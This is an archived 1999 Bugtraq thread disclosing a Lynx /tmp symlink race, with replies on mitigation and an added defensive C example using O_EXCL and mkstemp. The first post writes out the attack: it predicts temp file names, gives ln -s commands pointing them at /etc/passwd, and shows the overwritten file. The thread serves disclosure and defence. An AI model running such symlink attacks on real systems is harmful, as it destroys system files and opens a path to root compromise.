Lynx /tmp bug involving symlinks can lead to local root compromise.
Date: Tue, 9 Feb 1999 20:57:30 -0500
From: Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
To: BUGTRAQ@netspace.org
Subject: Lynx /tmp problem
Hi Aleph,
please filter this if already posted....
------
Hello....
I have found a bug in all versions of Lynx, except the latest stable
release...
lynx creates temporary files in /tmp in this way....
L[num proc]-xTMP.html
where
[num proc] is the process number on the machine
x is a number from 0 to 9
if I run lynx as any user, for example root, we see this
earthworm:~$ ps
PID TTY STAT TIME COMMAND
91 1 SW 0:06 (bash)
94 4 S 0:05 -bash
95 5 SW 0:06 (bash)
3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
3870 3 SW 0:02 (ssh)
3894 4 T 0:00 lynx
3898 4 R 0:00 ps
then the files in /tmp created by lynx will be..
L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html
if I make a symlink
from all of these files to any file in the system, for example....
earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html
and now if root (in this example) tries to download a file, or presses the
backspace key to reach the history list, the file I have linked (in this
case /etc/passwd) will be replaced with it... and it is now owned by root...
for example I got this on my system...
earthworm:/tmp$ cat /etc/passwd
<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
<em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>
as you can see, the file is lost now...
this bug is lynx specific, so all OSes are vulnerable..
Fix: upgrade to the latest lynx version; I have checked it, and it appears
to use L[proc num]-xTMP.html where x is from 0 to ???...
I hope it is already fixed; creating 100 symlinks is not too hard :)
the lynx team already knows about this.
bye...
Juan Diego
---------------------------------------------------------------------------
Date: Thu, 11 Feb 1999 12:55:41 -0700
From: Theo de Raadt <deraadt@CVS.OPENBSD.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem
> this bug is lynx specific, so all OSes are vulnerable..
OpenBSD ships with an integrated version of lynx. Our version has
tweaks to avoid this issue.
We've brought this issue up with the lynx people before. They do not
appear to give a damn.
That said, from reading the code I can see why they might not care --
this problem is going to be a complete nightmare to fix. Lynx's
handling of /tmp is fraught with many races, and the code is pasta.
---------------------------------------------------------------------------
Date: Fri, 12 Feb 1999 08:47:00 +0000
From: Glynn Clements <glynn@SENSEI.CO.UK>
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem
Juan Diego Bolanos wrote:
> Hi Aleph,
> please filter this if already posted....
The fact that lynx has potential /tmp problems was discussed last
March:
From: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
Subject: Another day, another race - lynx 2.7.1
Date: Tue, 17 Mar 1998 15:39:58 +0100
Message-ID: <Pine.LNX.3.96.980317152338.14878A-100000@genome>
> I have found a bug in all versions of Lynx, except the latest stable
> release...
>
> lynx creates temporary files in /tmp in this way....
[details of your average /tmp problem snipped].
From the INSTALLATION file:
The environment variable "LYNX_TEMP_SPACE", if set, will override the
default path prefix for temporary files that was defined via the constant
"TEMP_SPACE" in userdefs.h. See userdefs.h for more information.
--
Glynn Clements <glynn@sensei.co.uk>
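Added defensive example, not Lynx's own code: in C, the two ways a program can refuse a pre-planted symlink of the kind Juan Diego describes above, namely an O_CREAT|O_EXCL|O_NOFOLLOW open of the still-predictable name, and mkstemp(3) inside a private directory (the directory that LYNX_TEMP_SPACE, quoted by Glynn above, lets a user choose). The scratch directory, the "victim" file and the L3894-0TMP.html name are constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened open for a name that stays predictable: O_EXCL refuses any existing
 * entry (a planted symlink included) instead of writing through it. fd or -1. */
int open_temp_excl(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Better: unpredictable name plus O_EXCL semantics via mkstemp(3), inside a
 * private directory (what LYNX_TEMP_SPACE lets a user point at). fd or -1. */
int create_private_temp(const char *dir, char *out, size_t outlen)
{
    if (snprintf(out, outlen, "%s/lynxXXXXXX", dir) >= (int)outlen) return -1;
    return mkstemp(out);
}

/* Constructed scenario in a scratch directory: a symlink carrying the
 * predictable Lynx name points at a "victim" file; fopen(trap, "w") would
 * truncate the victim. Returns 0 if both defences hold, else the failing step. */
int demo_symlink_defense(void)
{
    char dir[] = "/tmp/lynxdemoXXXXXX", victim[64], trap[64], priv[80], buf[64] = "";
    const char *marker = "original contents\n";
    struct stat st; FILE *f; int fd, rc = 0;
    if (!mkdtemp(dir)) return 1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(trap, sizeof trap, "%s/L3894-0TMP.html", dir);
    if (!(f = fopen(victim, "w"))) return 2;
    fputs(marker, f); fclose(f);
    if (symlink(victim, trap) != 0) return 3;
    fd = open_temp_excl(trap);                  /* must fail: entry already exists */
    if (fd != -1 || (errno != EEXIST && errno != ELOOP)) rc = 4;
    f = rc ? NULL : fopen(victim, "r");         /* victim must be untouched */
    if (!rc && (!f || !fgets(buf, sizeof buf, f) || strcmp(buf, marker))) rc = 5;
    if (f) fclose(f);
    fd = create_private_temp(dir, priv, sizeof priv);
    if (!rc && (fd < 0 || lstat(priv, &st) || !S_ISREG(st.st_mode))) rc = 6;
    if (fd >= 0) { close(fd); unlink(priv); }
    unlink(trap); unlink(victim); rmdir(dir);
    return rc;
}
```

The same O_EXCL check is what makes the per-user temp directory a real mitigation rather than just a different place for the race: a private directory stops the attacker planting the link at all, and O_EXCL catches a link that got there anyway.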